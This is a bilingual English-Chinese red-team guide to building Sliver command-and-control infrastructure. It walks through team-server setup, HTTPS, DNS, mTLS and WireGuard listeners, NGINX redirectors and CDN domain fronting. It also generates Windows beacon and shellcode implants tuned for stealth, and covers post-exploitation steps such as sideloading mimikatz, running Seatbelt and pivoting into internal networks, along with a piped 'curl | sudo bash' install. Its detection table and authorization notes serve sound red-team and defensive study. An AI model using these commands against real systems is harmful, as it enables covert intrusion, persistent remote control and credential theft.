building-c2-infrastructure-with-sliver-framework
Compare original and translation side by side
🇺🇸
Original
English🇨🇳
Translation
ChineseBuilding C2 Infrastructure with Sliver Framework
使用Sliver框架构建C2基础设施
Overview
概述
Sliver is an open-source, cross-platform adversary emulation framework developed by BishopFox, written in Go. It provides red teams with implant generation, multi-protocol C2 channels (mTLS, HTTP/S, DNS, WireGuard), multi-operator support, and extensive post-exploitation capabilities. Sliver supports beacon (asynchronous) and session (interactive) modes, making it suitable for both long-haul operations and interactive exploitation. A properly architected Sliver infrastructure uses redirectors, domain fronting, and HTTPS certificates to maintain operational resilience and avoid detection.
Sliver是由BishopFox开发的开源跨平台敌手仿真框架,使用Go语言编写。它为红队提供植入程序生成、多协议C2通道(mTLS、HTTP/S、DNS、WireGuard)、多操作员支持以及丰富的后渗透测试功能。Sliver支持beacon(异步)和session(交互式)模式,适用于长期操作和交互式渗透测试。架构合理的Sliver基础设施会使用重定向器、域名前置和HTTPS证书来维持操作韧性并避免被检测。
When to Use
适用场景
- When deploying or configuring building c2 infrastructure with sliver framework capabilities in your environment
- When establishing security controls aligned to compliance requirements
- When building or improving security architecture for this domain
- When conducting security assessments that require this implementation
- 在环境中部署或配置基于Sliver框架的C2基础设施能力时
- 建立符合合规要求的安全控制措施时
- 构建或改进该领域的安全架构时
- 开展需要此实现的安全评估时
Prerequisites
前提条件
- Familiarity with red teaming concepts and tools
- Access to a test or lab environment for safe execution
- Python 3.8+ with required dependencies installed
- Appropriate authorization for any testing activities
- 熟悉红队概念与工具
- 可访问测试或实验室环境以安全执行操作
- 安装Python 3.8+及所需依赖
- 拥有任何测试活动的适当授权
Objectives
目标
- Deploy a Sliver team server on hardened cloud infrastructure
- Configure HTTPS, mTLS, DNS, and WireGuard listeners
- Generate implants (beacons and sessions) for target platforms
- Set up NGINX or Apache redirectors between implants and the team server
- Implement Cloudflare or CDN-based domain fronting for traffic obfuscation
- Configure multi-operator access with certificate-based authentication
- Establish operational security controls for C2 communications
- 在加固的云基础设施上部署Sliver团队服务器
- 配置HTTPS、mTLS、DNS和WireGuard监听器
- 为目标平台生成植入程序(beacon和session)
- 在植入程序与团队服务器之间设置NGINX或Apache重定向器
- 实施基于Cloudflare或CDN的域名前置以混淆流量
- 配置基于证书认证的多操作员访问权限
- 为C2通信建立操作安全控制措施
MITRE ATT&CK Mapping
MITRE ATT&CK映射
- T1071.001 - Application Layer Protocol: Web Protocols
- T1071.004 - Application Layer Protocol: DNS
- T1573.002 - Encrypted Channel: Asymmetric Cryptography
- T1090.002 - Proxy: External Proxy (Redirectors)
- T1105 - Ingress Tool Transfer
- T1132.001 - Data Encoding: Standard Encoding
- T1572 - Protocol Tunneling
- T1071.001 - 应用层协议:Web协议
- T1071.004 - 应用层协议:DNS
- T1573.002 - 加密通道:非对称加密
- T1090.002 - 代理:外部代理(重定向器)
- T1105 - 入口工具传输
- T1132.001 - 数据编码:标准编码
- T1572 - 协议隧道
Workflow
工作流程
Phase 1: Team Server Deployment
阶段1:团队服务器部署
- Provision a VPS (e.g., DigitalOcean, Linode, AWS EC2) for the team server
- Harden the OS: disable SSH password auth, configure UFW/iptables, install fail2ban
- Install Sliver using the official install script:
bash
curl https://sliver.sh/install | sudo bash - Start the Sliver server daemon:
bash
systemctl start sliver # Or run interactively sliver-server - Generate operator configuration files for team members:
bash
new-operator --name operator1 --lhost <team-server-ip>
- 为团队服务器配置VPS(如DigitalOcean、Linode、AWS EC2)
- 加固操作系统:禁用SSH密码认证、配置UFW/iptables、安装fail2ban
- 使用官方安装脚本安装Sliver:
bash
curl https://sliver.sh/install | sudo bash - 启动Sliver服务器守护进程:
bash
systemctl start sliver # 或以交互式方式运行 sliver-server - 为团队成员生成操作员配置文件:
bash
new-operator --name operator1 --lhost <team-server-ip>
Phase 2: Listener Configuration
阶段2:监听器配置
- Configure an HTTPS listener with a legitimate SSL certificate:
bash
https --lhost 0.0.0.0 --lport 443 --domain c2.example.com --cert /path/to/cert.pem --key /path/to/key.pem - Configure a DNS listener for fallback C2:
bash
dns --domains c2dns.example.com --lport 53 - Configure mTLS listener for high-security sessions:
bash
mtls --lhost 0.0.0.0 --lport 8888 - Configure WireGuard listener for tunneled access:
bash
wg --lport 51820
- 使用合法SSL证书配置HTTPS监听器:
bash
https --lhost 0.0.0.0 --lport 443 --domain c2.example.com --cert /path/to/cert.pem --key /path/to/key.pem - 配置DNS监听器作为备用C2通道:
bash
dns --domains c2dns.example.com --lport 53 - 配置mTLS监听器以实现高安全性会话:
bash
mtls --lhost 0.0.0.0 --lport 8888 - 配置WireGuard监听器以实现隧道访问:
bash
wg --lport 51820
Phase 3: Redirector Setup
阶段3:重定向器设置
- Deploy a separate VPS as a redirector (positioned between targets and team server)
- Install and configure NGINX as a reverse proxy:
nginx
server { listen 443 ssl; server_name c2.example.com; ssl_certificate /etc/letsencrypt/live/c2.example.com/fullchain.pem; ssl_certificate_key /etc/letsencrypt/live/c2.example.com/privkey.pem; location / { proxy_pass https://<team-server-ip>:443; proxy_ssl_verify off; proxy_set_header Host $host; proxy_set_header X-Real-IP $remote_addr; } } - Configure iptables rules on the team server to only accept connections from the redirector:
bash
iptables -A INPUT -p tcp --dport 443 -s <redirector-ip> -j ACCEPT iptables -A INPUT -p tcp --dport 443 -j DROP - Optionally set up Cloudflare as a CDN layer in front of the redirector for domain fronting
- 部署独立VPS作为重定向器(位于目标与团队服务器之间)
- 安装并配置NGINX作为反向代理:
nginx
server { listen 443 ssl; server_name c2.example.com; ssl_certificate /etc/letsencrypt/live/c2.example.com/fullchain.pem; ssl_certificate_key /etc/letsencrypt/live/c2.example.com/privkey.pem; location / { proxy_pass https://<team-server-ip>:443; proxy_ssl_verify off; proxy_set_header Host $host; proxy_set_header X-Real-IP $remote_addr; } } - 在团队服务器上配置iptables规则,仅接受来自重定向器的连接:
bash
iptables -A INPUT -p tcp --dport 443 -s <redirector-ip> -j ACCEPT iptables -A INPUT -p tcp --dport 443 -j DROP - 可选择在重定向器前设置Cloudflare作为CDN层以实现域名前置
Phase 4: Implant Generation
阶段4:植入程序生成
- Generate an HTTPS beacon implant:
bash
generate beacon --http https://c2.example.com --os windows --arch amd64 --format exe --name payload - Generate a DNS beacon for restricted networks:
bash
generate beacon --dns c2dns.example.com --os windows --arch amd64 - Generate a shellcode payload for injection:
bash
generate --http https://c2.example.com --os windows --arch amd64 --format shellcode - Configure beacon jitter and callback intervals:
bash
generate beacon --http https://c2.example.com --seconds 60 --jitter 30
- 生成HTTPS beacon植入程序:
bash
generate beacon --http https://c2.example.com --os windows --arch amd64 --format exe --name payload - 为受限网络生成DNS beacon:
bash
generate beacon --dns c2dns.example.com --os windows --arch amd64 - 生成用于注入的shellcode payload:
bash
generate --http https://c2.example.com --os windows --arch amd64 --format shellcode - 配置beacon抖动和回调间隔:
bash
generate beacon --http https://c2.example.com --seconds 60 --jitter 30
Phase 5: Post-Exploitation Operations
阶段5:后渗透测试操作
- Interact with active beacons/sessions:
bash
beacons # List active beacons use <beacon-id> # Interact with a beacon - Execute post-exploitation modules:
bash
ps # Process listing netstat # Network connections execute-assembly /path/to/Seatbelt.exe -group=all # Run .NET assemblies sideload /path/to/mimikatz.dll # Load DLLs - Set up pivots for internal network access:
bash
pivots tcp --bind 0.0.0.0:9898 # Create pivot listener on compromised host - Use BOF (Beacon Object Files) for in-memory execution:
bash
armory install sa-ldapsearch # Install from armory sa-ldapsearch -- "(objectClass=user)" # Execute BOF
- 与活跃的beacon/session交互:
bash
beacons # 列出活跃beacon use <beacon-id> # 与指定beacon交互 - 执行后渗透测试模块:
bash
ps # 进程列表 netstat # 网络连接 execute-assembly /path/to/Seatbelt.exe -group=all # 运行.NET程序集 sideload /path/to/mimikatz.dll # 加载DLL - 设置 pivot 以访问内部网络:
bash
pivots tcp --bind 0.0.0.0:9898 # 在受感染主机上创建pivot监听器 - 使用BOF(Beacon Object Files)实现内存中执行:
bash
armory install sa-ldapsearch # 从armory安装 sa-ldapsearch -- "(objectClass=user)" # 执行BOF
Tools and Resources
工具与资源
| Tool | Purpose | Platform |
|---|---|---|
| Sliver Server | C2 team server and implant management | Linux/macOS/Windows |
| Sliver Client | Operator console for team members | Cross-platform |
| NGINX | Redirector and reverse proxy | Linux |
| Certbot | Let's Encrypt SSL certificate generation | Linux |
| Cloudflare | CDN and domain fronting | Cloud |
| Armory | Sliver extension/BOF package manager | Built-in |
| 工具 | 用途 | 平台 |
|---|---|---|
| Sliver Server | C2团队服务器与植入程序管理 | Linux/macOS/Windows |
| Sliver Client | 团队成员操作员控制台 | 跨平台 |
| NGINX | 重定向器与反向代理 | Linux |
| Certbot | Let's Encrypt SSL证书生成 | Linux |
| Cloudflare | CDN与域名前置 | 云端 |
| Armory | Sliver扩展/BOF包管理器 | 内置 |
Detection Signatures
检测特征
| Indicator | Detection Method |
|---|---|
| Default Sliver HTTP headers | Network traffic analysis for unusual User-Agent strings |
| mTLS on non-standard ports | Firewall logs for outbound connections to unusual ports |
| DNS TXT record queries with high entropy | DNS log analysis for encoded C2 traffic |
| WireGuard UDP traffic on port 51820 | Network flow analysis for WireGuard handshake patterns |
| Sliver implant file hashes | EDR/AV signature matching against known Sliver samples |
| 指标 | 检测方法 |
|---|---|
| 默认Sliver HTTP头 | 分析网络流量中的异常User-Agent字符串 |
| 非标准端口上的mTLS | 分析防火墙日志中的非标准端口出站连接 |
| 高熵DNS TXT记录查询 | 分析DNS日志中的编码C2流量 |
| 51820端口上的WireGuard UDP流量 | 分析网络流中的WireGuard握手模式 |
| Sliver植入程序文件哈希 | EDR/AV根据已知Sliver样本进行特征匹配 |
Validation Criteria
验证标准
- Team server deployed and hardened with firewall rules
- HTTPS listener configured with valid SSL certificate
- DNS listener configured as fallback C2 channel
- At least one redirector deployed between targets and team server
- Multi-operator access configured with unique certificates
- Implants generated for target operating systems
- Beacon callback intervals and jitter configured for stealth
- Post-exploitation modules tested (process listing, .NET assembly execution)
- Pivot functionality validated for internal network access
- All C2 traffic encrypted and passing through redirectors
- 团队服务器已部署并通过防火墙规则加固
- HTTPS监听器已配置有效SSL证书
- DNS监听器已配置为备用C2通道
- 至少部署了一个位于目标与团队服务器之间的重定向器
- 已配置带有唯一证书的多操作员访问权限
- 已为目标操作系统生成植入程序
- 已为beacon配置回调间隔和抖动以实现 stealth
- 已测试后渗透测试模块(进程列表、.NET程序集执行)
- 已验证pivot功能可访问内部网络
- 所有C2流量均已加密并通过重定向器传输